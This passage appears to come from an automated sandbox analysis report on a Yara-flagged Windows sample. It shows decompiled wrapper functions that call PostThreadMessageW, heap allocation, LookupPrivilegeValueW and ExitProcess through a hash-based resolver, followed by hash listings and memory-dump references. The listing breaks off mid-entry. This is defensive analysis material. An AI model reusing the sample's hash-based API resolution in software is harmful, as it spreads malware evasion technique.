                                                                                                                                                            • Instruction ID: fcceadab495225344db43e8cd43de3fac09e5b8ef18c0673687ce972fc43dffa
                                                                                                                                                            • Opcode Fuzzy Hash: bc66a93de982fcc152c2eecad4ca8144d9429f41e232e602208d9272adf07d3c
                                                                                                                                                            • Instruction Fuzzy Hash: A301D831A803287BE721A6959C43FFE762CAB40F54F04411AFF04BA1C1E6A8691647EA
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                            			E004082F0(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                                                                            				char _v67;
                                                                                                                                                            				char _v68;
                                                                                                                                                            				void* _t12;
                                                                                                                                                            				intOrPtr* _t13;
                                                                                                                                                            				int _t14;
                                                                                                                                                            				long _t22;
                                                                                                                                                            				intOrPtr* _t26;
                                                                                                                                                            				void* _t27;
                                                                                                                                                            				void* _t31;
                                                                                                                                                            
                                                                                                                                                            				_t31 = __eflags;
                                                                                                                                                            				_v68 = 0;
                                                                                                                                                            				E0041B860( &_v67, 0, 0x3f);
                                                                                                                                                            				E0041C400( &_v68, 3);
                                                                                                                                                            				_t12 = E0040ACD0(__ebx, __edi, _t31, _a4 + 0x1c,  &_v68); // executed
                                                                                                                                                            				_t13 = E00414E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                                                                                                            				_t26 = _t13;
                                                                                                                                                            				if(_t26 != 0) {
                                                                                                                                                            					_push(__edi);
                                                                                                                                                            					_t22 = _a8;
                                                                                                                                                            					_t14 = PostThreadMessageW(_t22, 0x111, 0, 0); // executed
                                                                                                                                                            					_t33 = _t14;
                                                                                                                                                            					if(_t14 == 0) {
                                                                                                                                                            						_t14 =  *_t26(_t22, 0x8003, _t27 + (E0040A460(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                                                                                            					}
                                                                                                                                                            					return _t14;
                                                                                                                                                            				}
                                                                                                                                                            				return _t13;
                                                                                                                                                            			}












                                                                                                                                                            APIs
                                                                                                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1836367815-0
                                                                                                                                                            • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                                                                                                                            • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
                                                                                                                                                            • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                                                                                                                            • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                            			E0041A062(char* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                                                            				void* _v117;
                                                                                                                                                            				char _t14;
                                                                                                                                                            				void* _t23;
                                                                                                                                                            
                                                                                                                                                            				 *__ebx =  *__ebx - 0x6b;
                                                                                                                                                            				_t23 = ss;
                                                                                                                                                            				0x9331a688();
                                                                                                                                                            				_t11 = _a4;
                                                                                                                                                            				_t5 = _t11 + 0xc74; // 0xc74
                                                                                                                                                            				E0041A960(_t23, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                                                                            				_t14 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                                                            				return _t14;
                                                                                                                                                            			}






                                                                                                                                                            APIs
                                                                                                                                                            • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                            • Opcode ID: 9da90def7783d4c25f9e571d53aef5fc9b68f2689c6d2cc3276510882d855227
                                                                                                                                                            • Instruction ID: 6a412cf5b74168afc74f191587fe8f3ad948a635069b60cf77536eb96efd9734
                                                                                                                                                            • Opcode Fuzzy Hash: 9da90def7783d4c25f9e571d53aef5fc9b68f2689c6d2cc3276510882d855227
                                                                                                                                                            • Instruction Fuzzy Hash: E7F0A0B12002046BCB25DF75CC85EEB3BA9EF84360F154799F858AB292C631E851CBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                                                            				char _t10;
                                                                                                                                                            				void* _t15;
                                                                                                                                                            
                                                                                                                                                            				_t3 = _a4 + 0xc74; // 0xc74
                                                                                                                                                            				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                                                                            				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                                                            				return _t10;
                                                                                                                                                            			}





                                                                                                                                                            APIs
                                                                                                                                                            • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                            • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                                                                                                                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                            • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 36%
                                                                                                                                                            			E0041A030(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16) {
                                                                                                                                                            				intOrPtr _t9;
                                                                                                                                                            				void* _t10;
                                                                                                                                                            				void* _t12;
                                                                                                                                                            				void* _t15;
                                                                                                                                                            
                                                                                                                                                            				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                                                                                                            				_t9 = _a12;
                                                                                                                                                            				_t12 = _a8;
                                                                                                                                                            				asm("les edx, [edx+edx*2]");
                                                                                                                                                            				_push(_t9);
                                                                                                                                                            				_t10 = RtlAllocateHeap(_t12); // executed
                                                                                                                                                            				return _t10;
                                                                                                                                                            			}







                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                            • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                                                                                                                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                            • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                                                                            				int _t10;
                                                                                                                                                            				void* _t15;
                                                                                                                                                            
                                                                                                                                                            				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                                                                                                            				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                                                                            				return _t10;
                                                                                                                                                            			}





                                                                                                                                                            APIs
                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LookupPrivilegeValue
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3899507212-0
                                                                                                                                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                            • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                                                                                                                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                            • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E0041A0B0(intOrPtr _a4, int _a8) {
                                                                                                                                                            				void* _t10;
                                                                                                                                                            
                                                                                                                                                            				_t5 = _a4;
                                                                                                                                                            				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                                                                                            				ExitProcess(_a8);
                                                                                                                                                            			}




                                                                                                                                                            0x0041a0b3
                                                                                                                                                            0x0041a0ca
                                                                                                                                                            0x0041a0d8

                                                                                                                                                            APIs
                                                                                                                                                            • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0D8
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                            • Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
                                                                                                                                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                            • Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            • Opcode ID: 03e9093b74d1a94712e318f7cb5a534fa851ef372762b9642eb02261604237ed
                                                                                                                                                            • Instruction ID: 96abbc1245583e557aa17502adab52541910c39ac5ae80e3f600ee443de8581a
                                                                                                                                                            • Opcode Fuzzy Hash: 03e9093b74d1a94712e318f7cb5a534fa851ef372762b9642eb02261604237ed
                                                                                                                                                            • Instruction Fuzzy Hash: 54C08C713046218AE224EF64E8408B3B3AAFBC4340320C91BD58646000823244594665
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                                                                            • Instruction ID: 427099a31742f06c2784d45317e114aeb2b677ece39d72eeb184b4fb9f12223f
                                                                                                                                                            • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                                                                            • Instruction Fuzzy Hash: E1F0C2313289599BDB48EB289D55F6A33D9EBA4300F58C439ED49CB341D635FD408390
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                                                                            • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                                                                                                                            • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                                                                            • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                                                                            • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                                                                                                                            • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                                                                            • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                                                                                                            • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                                                                                                                            • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                                                                                                            • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                                                                                                            • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                                                                                                                            • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                                                                                                            • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
• Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp
• Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                                                                                            • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                                                                                                                            • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                                                                                            • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                            • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                            • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                            • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                                                                            • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                                                                                                                            • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                                                                            • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                                                                                                                            • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                                                                                                                            • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                                                                                                                            • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                                                                                            • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                                                                                                                            • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                                                                                            • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
